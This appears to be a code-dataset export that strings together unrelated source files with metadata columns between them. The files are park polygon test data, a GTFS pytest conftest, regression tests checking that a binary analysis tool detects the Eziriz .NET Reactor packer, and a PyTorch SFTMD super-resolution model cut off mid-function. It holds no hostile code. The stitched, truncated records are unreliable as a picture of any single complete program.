invalid_poly_coord_sets_2 = """POLY
Park Name, Feature Description
Post Office Square, Boundary of Post Office Square with holes for buildings
42.356856, -71.055757, 0.0
42.35608, -71.054976, 0.0
42.355697, -71.055636, 0.0
42.356003, -71.055941, 0.0
42.356767, -71.05622, 0.0
42.356856, -71.055757, 0.0
42.355955, -71.055522, 0.0
42.355894, -71.055458, 0.0
42.355846, -71.055546, 0.0
42.355908, -71.055615, 0.0
42.355955, -71.055522, 0.0
42.356089, -71.055312, 0.0
42.356005, -71.055226, 0.0
42.355969, -71.055288, 0.0
42.356058, -71.055373, 0.0
42.356089, -71.055312, 0.0
Boston Common, Boundary of Boston Common with a hole for the Frog Pond
42.356514, -71.062157, 0.0
42.355222, -71.063337, 0.0
42.352457, -71.064638, 0.0
42.352639, -71.067238, 0.0
42.356132, -71.06915, 0.0
42.357591, -71.06326, 0.0
42.356514, -71.062157, 0.0
42.356047, -71.065045, 0.0
42.355953, -71.065107, 0.0
42.355911, -71.065249, 0.0
42.356018, -71.065909, 0.0
42.35601, -71.066016, 0.0
42.355918, -71.066198, 0.0
42.355854, -71.066417, 0.0
42.355876, -71.066521, 0.0
42.355938, -71.066564, 0.0
42.355985, -71.066547, 0.0
42.356221, -71.066, 0.0
42.356296, -71.065647, 0.0
42.35627, -71.065341, 0.0
42.356186, -71.065127, 0.0
42.356123, -71.065061, 0.0
42.356047, -71.065045, 0.0
"""
| 17.67366
| 75
| 0.680427
| 1,499
| 7,582
| 3.414276
| 0.106738
| 0.067995
| 0.125049
| 0.028136
| 0.96991
| 0.96991
| 0.943142
| 0.940406
| 0.940406
| 0.940406
| 0
| 0.519698
| 0.14297
| 7,582
| 429
| 76
| 17.67366
| 0.267929
| 0.007782
| 0
| 0.939394
| 0
| 0
| 0.939039
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
2fe5fa8c0f690ef86c1d2f99a56c03f36914d199
| 338
|
py
|
Python
|
tests/conftest.py
|
davidkyburz/gtfs-lite
|
cc3a5df7a9e582264130771a688b12eb2ea0c08c
|
[
"MIT"
] | 4
|
2020-06-03T14:44:27.000Z
|
2022-03-24T01:11:04.000Z
|
tests/conftest.py
|
davidkyburz/gtfs-lite
|
cc3a5df7a9e582264130771a688b12eb2ea0c08c
|
[
"MIT"
] | 3
|
2020-06-18T15:48:35.000Z
|
2021-03-31T14:45:13.000Z
|
tests/conftest.py
|
davidkyburz/gtfs-lite
|
cc3a5df7a9e582264130771a688b12eb2ea0c08c
|
[
"MIT"
] | 2
|
2021-03-13T00:15:21.000Z
|
2021-04-13T21:38:23.000Z
|
from datetime import date, time

import pytest


@pytest.fixture
def feed_zipfile():
    """Path to the bundled Metra GTFS feed used by the tests."""
    return r"data/metra_2020-02-23.zip"


@pytest.fixture
def test_date():
    """A service date presumably covered by the fixture feed — confirm."""
    return date(2020, 2, 24)


@pytest.fixture
def test_timerange():
    """Full-day time window [00:00, 23:59]."""
    return [time(0, 0), time(23, 59)]


@pytest.fixture
def test_stop_ids():
    # NOTE(review): returns a time range, not stop ids — looks like a
    # copy-paste of test_timerange; confirm the intended stop-id list.
    return [time(0, 0), time(23, 59)]
| 18.777778
| 39
| 0.695266
| 55
| 338
| 4.163636
| 0.472727
| 0.227074
| 0.279476
| 0.262009
| 0.174672
| 0.174672
| 0.174672
| 0
| 0
| 0
| 0
| 0.09507
| 0.159763
| 338
| 18
| 40
| 18.777778
| 0.711268
| 0
| 0
| 0.428571
| 0
| 0
| 0.073746
| 0.073746
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| true
| 0
| 0.142857
| 0.285714
| 0.714286
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
641e70a5914ffc3dba0ea328a0529e8b586a37b9
| 2,533
|
py
|
Python
|
tools/fileinfo/features/eziriz-packer-detection/test.py
|
stepanek-m/retdec-regression-tests
|
12b834b14ede2826fec451368fa8192ab00ddadf
|
[
"MIT"
] | null | null | null |
tools/fileinfo/features/eziriz-packer-detection/test.py
|
stepanek-m/retdec-regression-tests
|
12b834b14ede2826fec451368fa8192ab00ddadf
|
[
"MIT"
] | null | null | null |
tools/fileinfo/features/eziriz-packer-detection/test.py
|
stepanek-m/retdec-regression-tests
|
12b834b14ede2826fec451368fa8192ab00ddadf
|
[
"MIT"
] | null | null | null |
from regression_tests import *
class Eziriz42Test(Test):
    """fileinfo should detect Eziriz .NET Reactor 4.2 on these packed PE samples."""
    settings = TestSettings(
        tool='fileinfo',
        args='--json --verbose',
        input=['x86-pe-ff10e014c94cbc89f9e653bc647b6d5a', 'x86-pe-d5a674ff381b95f36f3f4ef3e5a8d0c4-eziriz42']
    )

    def test_fileinfo_json_output_is_correctly_parsed(self):
        """Check format, data directory 14 (CLR runtime header), tool and language."""
        assert self.fileinfo.succeeded
        self.assertEqual(self.fileinfo.output['fileFormat'], 'PE')
        self.assertEqual(self.fileinfo.output['dataDirectories']['numberOfDataDirectories'], '16')
        # Entry 14 is present but zeroed for these samples.
        self.assertEqual(self.fileinfo.output['dataDirectories']['dataDirectoryEntries'][14]['index'], '14')
        self.assertEqual(self.fileinfo.output['dataDirectories']['dataDirectoryEntries'][14]['address'], '0')
        self.assertEqual(self.fileinfo.output['dataDirectories']['dataDirectoryEntries'][14]['size'], '0')
        self.assertEqual(self.fileinfo.output['dataDirectories']['dataDirectoryEntries'][14]['type'], 'CLR runtime header')
        self.assertEqual(self.fileinfo.output['tools'][0]['name'], 'Eziriz .NET Reactor')
        self.assertEqual(self.fileinfo.output['tools'][0]['version'], '4.2')
        self.assertEqual(self.fileinfo.output['languages'][0]['name'], 'CIL/.NET')
        self.assertTrue(self.fileinfo.output['languages'][0]['bytecode'])
class Eziriz50Test(Test):
    """fileinfo should detect Eziriz .NET Reactor 4.8-5.0 on this packed PE sample."""
    settings = TestSettings(
        tool='fileinfo',
        args='--json --verbose',
        input='x86-pe-08f9c6c1cfb53ece69025050c95fcd5e-eziriz5'
    )

    def test_fileinfo_json_output_is_correctly_parsed(self):
        """Check format, data directory 14 (CLR runtime header), tool and language."""
        assert self.fileinfo.succeeded
        self.assertEqual(self.fileinfo.output['fileFormat'], 'PE')
        self.assertEqual(self.fileinfo.output['dataDirectories']['numberOfDataDirectories'], '15')
        # Unlike the 4.2 samples, entry 14 is populated (non-zero address/size).
        self.assertEqual(self.fileinfo.output['dataDirectories']['dataDirectoryEntries'][14]['index'], '14')
        self.assertTrue(self.fileinfo.output['dataDirectories']['dataDirectoryEntries'][14]['address'] != 0)
        self.assertTrue(self.fileinfo.output['dataDirectories']['dataDirectoryEntries'][14]['size'] != 0)
        self.assertEqual(self.fileinfo.output['dataDirectories']['dataDirectoryEntries'][14]['type'], 'CLR runtime header')
        self.assertEqual(self.fileinfo.output['tools'][0]['name'], 'Eziriz .NET Reactor')
        self.assertEqual(self.fileinfo.output['tools'][0]['version'], '4.8 - 5.0')
        self.assertEqual(self.fileinfo.output['languages'][0]['name'], 'CIL/.NET')
        self.assertTrue(self.fileinfo.output['languages'][0]['bytecode'])
| 57.568182
| 123
| 0.69167
| 257
| 2,533
| 6.766537
| 0.237354
| 0.151811
| 0.207016
| 0.248419
| 0.895342
| 0.895342
| 0.894767
| 0.894767
| 0.876941
| 0.79356
| 0
| 0.049636
| 0.133044
| 2,533
| 43
| 124
| 58.906977
| 0.742259
| 0
| 0
| 0.594595
| 0
| 0
| 0.322148
| 0.071062
| 0
| 0
| 0
| 0
| 0.594595
| 1
| 0.054054
| false
| 0
| 0.027027
| 0
| 0.189189
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ff7a35b774cb2375cae41358c19078d6b9f8e8d1
| 49,053
|
py
|
Python
|
superresolution_stage/models/archs/sftmd.py
|
xian1234/SRBuildSeg
|
db16ae2aba6aaa336a0b612446c80b4546b96a1f
|
[
"MIT"
] | 9
|
2021-04-06T12:46:47.000Z
|
2022-03-26T09:10:11.000Z
|
superresolution_stage/models/archs/sftmd.py
|
xian1234/SRBuildSeg
|
db16ae2aba6aaa336a0b612446c80b4546b96a1f
|
[
"MIT"
] | null | null | null |
superresolution_stage/models/archs/sftmd.py
|
xian1234/SRBuildSeg
|
db16ae2aba6aaa336a0b612446c80b4546b96a1f
|
[
"MIT"
] | null | null | null |
""" Architecture for SFTMD """
import functools
import torch
import torch.nn as nn
import torch.nn.functional as F
import models.archs.arch_util as arch_util
import torch.nn.utils.spectral_norm as spectral_norm
class SFTLayer(nn.Module):
    """Spatial feature transform: features * scale(cond) + shift(cond).

    Scale and shift maps are each produced by a 2-conv branch fed with the
    concatenation of the feature maps and the condition maps; the scale
    branch is squashed through a sigmoid.
    """

    def __init__(self, nf=64, n_condition=10):
        super(SFTLayer, self).__init__()
        # TODO: can use shared convolution layers to save computation
        self.mul_conv1 = nn.Conv2d(nf + n_condition, 32, 3, 1, 1)
        self.mul_conv2 = nn.Conv2d(32, nf, 3, 1, 1)
        self.add_conv1 = nn.Conv2d(nf + n_condition, 32, 3, 1, 1)
        self.add_conv2 = nn.Conv2d(32, nf, 3, 1, 1)
        self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)

    def forward(self, features, conditions):
        stacked = torch.cat((features, conditions), dim=1)
        scale = torch.sigmoid(self.mul_conv2(self.lrelu(self.mul_conv1(stacked))))
        shift = self.add_conv2(self.lrelu(self.add_conv1(stacked)))
        return features * scale + shift
class SFTLayer_SN(nn.Module):
    """SFT layer with spectral normalization on all four convolutions.

    Same affine transform as SFTLayer (features * sigmoid-scale + shift);
    each conv weight — and optionally each bias — is spectrally normalized.
    """

    def __init__(self, nf=64, n_condition=10, n_power_iterations=1, bias_sn=False):
        super(SFTLayer_SN, self).__init__()
        # TODO: can use shared convolution layers to save computation
        self.mul_conv1 = spectral_norm(
            nn.Conv2d(nf + n_condition, 32, kernel_size=3, stride=1, padding=1), name='weight',
            n_power_iterations=n_power_iterations)
        self.mul_conv2 = spectral_norm(nn.Conv2d(32, nf, kernel_size=3, stride=1, padding=1),
                                       name='weight', n_power_iterations=n_power_iterations)
        self.add_conv1 = spectral_norm(
            nn.Conv2d(nf + n_condition, 32, kernel_size=3, stride=1, padding=1), name='weight',
            n_power_iterations=n_power_iterations)
        self.add_conv2 = spectral_norm(nn.Conv2d(32, nf, kernel_size=3, stride=1, padding=1),
                                       name='weight', n_power_iterations=n_power_iterations)
        if bias_sn:
            # Re-wrap each conv to spectrally normalize its bias as well.
            self.mul_conv1 = spectral_norm(self.mul_conv1, name='bias',
                                           n_power_iterations=n_power_iterations)
            self.mul_conv2 = spectral_norm(self.mul_conv2, name='bias',
                                           n_power_iterations=n_power_iterations)
            self.add_conv1 = spectral_norm(self.add_conv1, name='bias',
                                           n_power_iterations=n_power_iterations)
            self.add_conv2 = spectral_norm(self.add_conv2, name='bias',
                                           n_power_iterations=n_power_iterations)
        self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)

    def forward(self, features, conditions):
        cat_input = torch.cat((features, conditions), dim=1)
        mul = torch.sigmoid(self.mul_conv2(self.lrelu(self.mul_conv1(cat_input))))
        add = self.add_conv2(self.lrelu(self.add_conv1(cat_input)))
        return features * mul + add
class SFTLayer_SN_Norm(nn.Module):
    """SFT layer with spectral-normalized convs and a norm layer after each conv.

    Args:
        nf: number of feature channels.
        n_condition: number of condition channels concatenated to the features.
        n_power_iterations: power iterations for spectral norm.
        norm: 'batch' for BatchNorm2d or 'instance' for InstanceNorm2d.

    Raises:
        ValueError: if ``norm`` is neither 'batch' nor 'instance'.
    """

    def __init__(self, nf=64, n_condition=10, n_power_iterations=1, norm='batch'):
        super(SFTLayer_SN_Norm, self).__init__()
        # TODO: can use shared convolution layers to save computation
        if norm == 'batch':
            norm_layer = functools.partial(nn.BatchNorm2d, affine=True, track_running_stats=True)
        elif norm == 'instance':
            norm_layer = functools.partial(nn.InstanceNorm2d, affine=True,
                                           track_running_stats=True)
        else:
            # Fail fast: previously an unknown norm left norm_layer unbound
            # and raised an opaque NameError below.
            raise ValueError("norm must be 'batch' or 'instance', got %r" % (norm,))
        self.mul_conv1 = spectral_norm(
            nn.Conv2d(nf + n_condition, 32, kernel_size=3, stride=1, padding=1), name='weight',
            n_power_iterations=n_power_iterations)
        self.mul_norm1 = norm_layer(num_features=32)
        self.mul_conv2 = spectral_norm(nn.Conv2d(32, nf, kernel_size=3, stride=1, padding=1),
                                       name='weight', n_power_iterations=n_power_iterations)
        self.mul_norm2 = norm_layer(num_features=nf)
        self.add_conv1 = spectral_norm(
            nn.Conv2d(nf + n_condition, 32, kernel_size=3, stride=1, padding=1), name='weight',
            n_power_iterations=n_power_iterations)
        self.add_norm1 = norm_layer(num_features=32)
        self.add_conv2 = spectral_norm(nn.Conv2d(32, nf, kernel_size=3, stride=1, padding=1),
                                       name='weight', n_power_iterations=n_power_iterations)
        self.add_norm2 = norm_layer(num_features=nf)
        self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)

    def forward(self, features, conditions):
        cat_input = torch.cat((features, conditions), dim=1)
        mul = torch.sigmoid(
            self.mul_norm2(self.mul_conv2(self.lrelu(self.mul_norm1(self.mul_conv1(cat_input))))))
        add = self.add_norm2(self.add_conv2(self.lrelu(self.add_norm1(self.add_conv1(cat_input)))))
        return features * mul + add
class SFTLayer_SN_ReLU(nn.Module):
    """SFT layer with spectral-normalized convs and plain ReLU (not LeakyReLU)."""

    def __init__(self, nf=64, n_condition=10, n_power_iterations=1):
        super(SFTLayer_SN_ReLU, self).__init__()
        # TODO: can use shared convolution layers to save computation
        self.mul_conv1 = spectral_norm(
            nn.Conv2d(nf + n_condition, 32, kernel_size=3, stride=1, padding=1), name='weight',
            n_power_iterations=n_power_iterations)
        self.mul_conv2 = spectral_norm(nn.Conv2d(32, nf, kernel_size=3, stride=1, padding=1),
                                       name='weight', n_power_iterations=n_power_iterations)
        self.add_conv1 = spectral_norm(
            nn.Conv2d(nf + n_condition, 32, kernel_size=3, stride=1, padding=1), name='weight',
            n_power_iterations=n_power_iterations)
        self.add_conv2 = spectral_norm(nn.Conv2d(32, nf, kernel_size=3, stride=1, padding=1),
                                       name='weight', n_power_iterations=n_power_iterations)
        self.relu = nn.ReLU(inplace=True)

    def forward(self, features, conditions):
        cat_input = torch.cat((features, conditions), dim=1)
        mul = torch.sigmoid(self.mul_conv2(self.relu(self.mul_conv1(cat_input))))
        add = self.add_conv2(self.relu(self.add_conv1(cat_input)))
        return features * mul + add
class SFTResidualBlock(nn.Module):
    """Residual block: two SFT layers interleaved with two 3x3 convolutions.

    Args:
        nf: number of feature channels.
        n_condition: number of condition channels passed to the SFT layers.
    """

    def __init__(self, nf=64, n_condition=10):
        super(SFTResidualBlock, self).__init__()
        self.sft1 = SFTLayer(nf=nf, n_condition=n_condition)
        self.sft2 = SFTLayer(nf=nf, n_condition=n_condition)
        # Use nf for the channel counts; they were hard-coded to 64, which
        # broke the block for any nf != 64 (SFT layers emit nf channels).
        self.conv1 = nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True)
        self.conv2 = nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True)
        self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
        arch_util.initialize_weights([self.conv1, self.conv2], 0.1)

    def forward(self, features, conditions):
        """Return features + residual(features, conditions)."""
        fea = self.lrelu(self.sft1(features, conditions))
        fea = self.lrelu(self.sft2(self.conv1(fea), conditions))
        fea = self.conv2(fea)
        return features + fea
class SFTResidualBlock_SN(nn.Module):
    """Spectral-norm variant of SFTResidualBlock.

    Args:
        nf: number of feature channels.
        n_condition: condition channels for the SFT layers.
        n_power_iterations: power iterations for spectral norm.
        bias_sn: also spectrally normalize bias parameters.
    """

    def __init__(self, nf=64, n_condition=10, n_power_iterations=1, bias_sn=False):
        super(SFTResidualBlock_SN, self).__init__()
        # Forward n_power_iterations/bias_sn to the SFT layers; they were
        # previously accepted here but silently dropped (cf. the _SN_Norm
        # block, which does forward its settings).
        self.sft1 = SFTLayer_SN(nf=nf, n_condition=n_condition,
                                n_power_iterations=n_power_iterations, bias_sn=bias_sn)
        self.sft2 = SFTLayer_SN(nf=nf, n_condition=n_condition,
                                n_power_iterations=n_power_iterations, bias_sn=bias_sn)
        # Use nf channel counts (were hard-coded to 64, breaking nf != 64).
        self.conv1 = spectral_norm(nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True),
                                   name='weight', n_power_iterations=n_power_iterations)
        self.conv2 = spectral_norm(nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True),
                                   name='weight', n_power_iterations=n_power_iterations)
        self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
        if bias_sn:
            self.conv1 = spectral_norm(self.conv1, name='bias',
                                       n_power_iterations=n_power_iterations)
            self.conv2 = spectral_norm(self.conv2, name='bias',
                                       n_power_iterations=n_power_iterations)
        arch_util.initialize_weights([self.conv1, self.conv2], 0.1)

    def forward(self, features, conditions):
        """Return features + residual(features, conditions)."""
        fea = self.lrelu(self.sft1(features, conditions))
        fea = self.lrelu(self.sft2(self.conv1(fea), conditions))
        fea = self.conv2(fea)
        return features + fea
class SFTResidualBlock_SN_Norm(nn.Module):
    """Spectral-norm + normalization variant of SFTResidualBlock.

    Args:
        nf: number of feature channels.
        n_condition: condition channels for the SFT layers.
        n_power_iterations: power iterations for spectral norm.
        norm: 'batch' for BatchNorm2d or 'instance' for InstanceNorm2d.

    Raises:
        ValueError: if ``norm`` is neither 'batch' nor 'instance'.
    """

    def __init__(self, nf=64, n_condition=10, n_power_iterations=1, norm='batch'):
        super(SFTResidualBlock_SN_Norm, self).__init__()
        if norm == 'batch':
            norm_layer = functools.partial(nn.BatchNorm2d, affine=True, track_running_stats=True)
        elif norm == 'instance':
            norm_layer = functools.partial(nn.InstanceNorm2d, affine=True,
                                           track_running_stats=True)
        else:
            # Fail fast: previously an unknown norm left norm_layer unbound
            # and raised an opaque NameError below.
            raise ValueError("norm must be 'batch' or 'instance', got %r" % (norm,))
        self.sft1 = SFTLayer_SN_Norm(nf=nf, n_condition=n_condition,
                                     n_power_iterations=n_power_iterations, norm=norm)
        self.sft2 = SFTLayer_SN_Norm(nf=nf, n_condition=n_condition,
                                     n_power_iterations=n_power_iterations, norm=norm)
        # Use nf channel counts (were hard-coded to 64, breaking nf != 64).
        self.conv1 = spectral_norm(nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True),
                                   name='weight', n_power_iterations=n_power_iterations)
        self.norm1 = norm_layer(num_features=nf)
        self.conv2 = spectral_norm(nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True),
                                   name='weight', n_power_iterations=n_power_iterations)
        self.norm2 = norm_layer(num_features=nf)
        self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
        arch_util.initialize_weights([self.conv1, self.conv2], 0.1)

    def forward(self, features, conditions):
        """Return features + residual(features, conditions)."""
        fea = self.lrelu(self.sft1(features, conditions))
        fea = self.lrelu(self.sft2(self.norm1(self.conv1(fea)), conditions))
        fea = self.norm2(self.conv2(fea))
        return features + fea
class SFTResidualBlock_SN_ReLU(nn.Module):
    """Residual block with SFT conditioning, spectral-norm convs and ReLU activations.

    Args:
        nf: number of feature channels (previously the convs hard-coded 64,
            silently ignoring this argument).
        n_condition: number of condition channels for the SFT layers.
        n_power_iterations: power iterations for spectral normalization.
    """

    def __init__(self, nf=64, n_condition=10, n_power_iterations=1):
        super(SFTResidualBlock_SN_ReLU, self).__init__()
        self.sft1 = SFTLayer_SN_ReLU(nf=nf, n_condition=n_condition)
        self.sft2 = SFTLayer_SN_ReLU(nf=nf, n_condition=n_condition)
        # Use nf (default 64) rather than a hard-coded 64 so non-default widths work.
        self.conv1 = spectral_norm(nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True),
                                   name='weight', n_power_iterations=n_power_iterations)
        self.conv2 = spectral_norm(nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True),
                                   name='weight', n_power_iterations=n_power_iterations)
        self.relu = nn.ReLU(inplace=True)
        arch_util.initialize_weights([self.conv1, self.conv2], 0.1)

    def forward(self, features, conditions):
        """Return features + residual, with SFT modulation before each conv."""
        fea = self.relu(self.sft1(features, conditions))
        fea = self.relu(self.sft2(self.conv1(fea), conditions))
        fea = self.conv2(fea)
        return features + fea
class SFTMD(nn.Module):
    """SFTMD super-resolution network: a trunk of SFT residual blocks whose
    features are modulated by a degradation/kernel code, followed by
    PixelShuffle upscaling.
    """

    def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16):
        # inc: image channels; nf: feature width; n_condition: code channels;
        # scale: upscaling factor; n_RB: number of SFT residual blocks.
        super(SFTMD, self).__init__()
        self.n_RB = n_RB
        self.conv_first = nn.Conv2d(inc, nf, 3, stride=1, padding=1)
        for i in range(n_RB):
            self.add_module('SFTRB' + str(i), SFTResidualBlock(nf=nf, n_condition=n_condition))
        self.sft_extra = SFTLayer(nf=nf, n_condition=n_condition)
        self.conv_extra = nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True)
        if scale == 4:
            # x4 upscaling is realised as two PixelShuffle(2) stages.
            self.upscale = nn.Sequential(
                nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale // 2),
                nn.LeakyReLU(0.1, inplace=True),
                nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale // 2),
                nn.LeakyReLU(0.1, inplace=True),
            )
        else:
            self.upscale = nn.Sequential(
                nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale),
                nn.LeakyReLU(0.1, inplace=True),
            )
        self.conv_final = nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True)
        self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)

    def forward(self, input, kernel_code, spatial=False, extra=False):
        """Super-resolve `input` conditioned on `kernel_code`.

        When `spatial` is False, `kernel_code` is a (B, C) vector expanded to a
        (B, C, H, W) map; otherwise it is used as-is (assumed already spatial).
        When `extra` is True, the pre-upscale feature map is also returned.
        """
        _, _, H, W = input.size()
        if not spatial:
            Bk, Ck = kernel_code.size()
            kernel_code = kernel_code.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
        fea = self.lrelu(self.conv_first(input))
        fea_sft = fea.clone()
        for i in range(self.n_RB):
            fea_sft = self.__getattr__('SFTRB' + str(i))(fea_sft, kernel_code)
        # Long skip connection around the residual-block trunk.
        fea = fea + fea_sft
        fea = self.conv_extra(self.lrelu(self.sft_extra(fea, kernel_code)))
        out = self.conv_final(self.upscale(fea))
        if extra:
            return out, fea
        else:
            return out
class SFTMD_Ushape(nn.Module):
    """U-shaped SFTMD: the SFT residual trunk is max-pooled down and bilinearly
    upsampled back, with the kernel code re-expanded to the matching spatial
    size at every level.

    NOTE(review): assumes input H/W are divisible by 2**(n_RB // 2) so the
    pooled/upsampled sizes line up — confirm with callers.
    """

    def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16):
        super(SFTMD_Ushape, self).__init__()
        self.n_RB = n_RB
        self.conv_first = nn.Conv2d(inc, nf, 3, stride=1, padding=1)
        # downsample operation
        for i in range(n_RB // 2):
            self.add_module('SFTRB_down' + str(i), SFTResidualBlock(nf=nf, n_condition=n_condition))
        self.mid_layer = SFTResidualBlock(nf=nf, n_condition=n_condition)
        # upsample operation
        for i in range(n_RB // 2):
            self.add_module('SFTRB_up' + str(i), SFTResidualBlock(nf=nf, n_condition=n_condition))
        self.sft_extra = SFTLayer(nf=nf, n_condition=n_condition)
        self.conv_extra = nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True)
        if scale == 4:
            # x4 upscaling as two PixelShuffle(2) stages.
            self.upscale = nn.Sequential(
                nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale // 2),
                nn.LeakyReLU(0.1, inplace=True),
                nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale // 2),
                nn.LeakyReLU(0.1, inplace=True),
            )
        else:
            self.upscale = nn.Sequential(
                nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale),
                nn.LeakyReLU(0.1, inplace=True),
            )
        self.conv_final = nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True)
        self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
        self.max_pool = nn.MaxPool2d(2, 2)

    def forward(self, input, kernel_code, spatial=False, extra=False):
        """Super-resolve `input` with a U-shaped SFT trunk.

        `kernel_code` is a (B, C) vector; `spatial` is accepted for interface
        compatibility but effectively ignored (the code is always expanded from
        a vector here). `extra` additionally returns the pre-upscale features.
        """
        _, _, H_in, W_in = input.size()
        kernel_code_ori = kernel_code.clone()
        # if not spatial:
        #     Bk, Ck = kernel_code_ori.size()
        #     kernel_code = kernel_code_ori.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
        Bk, Ck = kernel_code_ori.size()
        fea = self.lrelu(self.conv_first(input))
        fea_sft = fea.clone()
        # down_scale
        kernel_code_list = []
        for i in range(self.n_RB // 2):
            # Expand the code to the current (pre-pool) feature resolution.
            H = int(H_in * 2 ** (-1 * i))
            W = int(W_in * 2 ** (-1 * i))
            kernel_code = kernel_code_ori.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
            fea_sft_x2 = self.__getattr__('SFTRB_down' + str(i))(fea_sft, kernel_code)
            fea_sft = self.max_pool(fea_sft_x2)
            # insert(0, ...) orders the list coarse -> fine so that
            # kernel_code_list[i] matches the i-th upsampling stage below.
            kernel_code_list.insert(0, kernel_code)
        H = int(H_in * 2 ** (-1 * (self.n_RB // 2)))
        W = int(W_in * 2 ** (-1 * (self.n_RB // 2)))
        kernel_code = kernel_code_ori.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
        fea_sft = self.mid_layer(fea_sft, kernel_code)
        #up_scale
        for i in range(self.n_RB // 2):
            fea_sft = F.interpolate(fea_sft, scale_factor=2, mode='bilinear', align_corners=False)
            fea_sft = self.__getattr__('SFTRB_up' + str(i))(fea_sft, kernel_code_list[i])
        # Last list entry is the full-resolution code map for the final SFT layer.
        kernel_code = kernel_code_list[self.n_RB // 2 - 1]
        fea = fea + fea_sft
        fea = self.conv_extra(self.lrelu(self.sft_extra(fea, kernel_code)))
        out = self.conv_final(self.upscale(fea))
        if extra:
            return out, fea
        else:
            return out
class SFTMD_Noise_JPEG(nn.Module):
    """SFTMD variant conditioned on the concatenation of kernel, noise and JPEG
    degradation codes (hence the default n_condition=12).
    """

    def __init__(self, inc=3, nf=64, n_condition=12, scale=4, n_RB=16):
        # inc: image channels; nf: feature width; n_condition: total code
        # channels after concatenation; scale: upscaling factor; n_RB: trunk depth.
        super(SFTMD_Noise_JPEG, self).__init__()
        self.n_RB = n_RB
        self.conv_first = nn.Conv2d(inc, nf, 3, stride=1, padding=1)
        for i in range(n_RB):
            self.add_module('SFTRB' + str(i), SFTResidualBlock(nf=nf, n_condition=n_condition))
        self.sft_extra = SFTLayer(nf=nf, n_condition=n_condition)
        self.conv_extra = nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True)
        if scale == 4:
            # x4 upscaling realised as two PixelShuffle(2) stages.
            self.upscale = nn.Sequential(
                nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale // 2),
                nn.LeakyReLU(0.1, inplace=True),
                nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale // 2),
                nn.LeakyReLU(0.1, inplace=True),
            )
        else:
            self.upscale = nn.Sequential(
                nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale),
                nn.LeakyReLU(0.1, inplace=True),
            )
        self.conv_final = nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True)
        self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)

    def forward(self, input, kernel_code, noise, jpeg, spatial=False, extra=False):
        """Super-resolve `input` conditioned on the joint (kernel, noise, jpeg) code.

        When `spatial` is False, the codes are (B, C) vectors that are
        concatenated and broadcast to (B, C, H, W); when True, they are assumed
        to already be spatial maps and are only concatenated.
        """
        _, _, H, W = input.size()
        # Build the joint code unconditionally: previously `codes` was only
        # assigned inside `if not spatial`, so spatial=True raised NameError.
        codes = torch.cat((kernel_code, noise, jpeg), dim=1)
        if not spatial:
            Bk, Ck = codes.size()
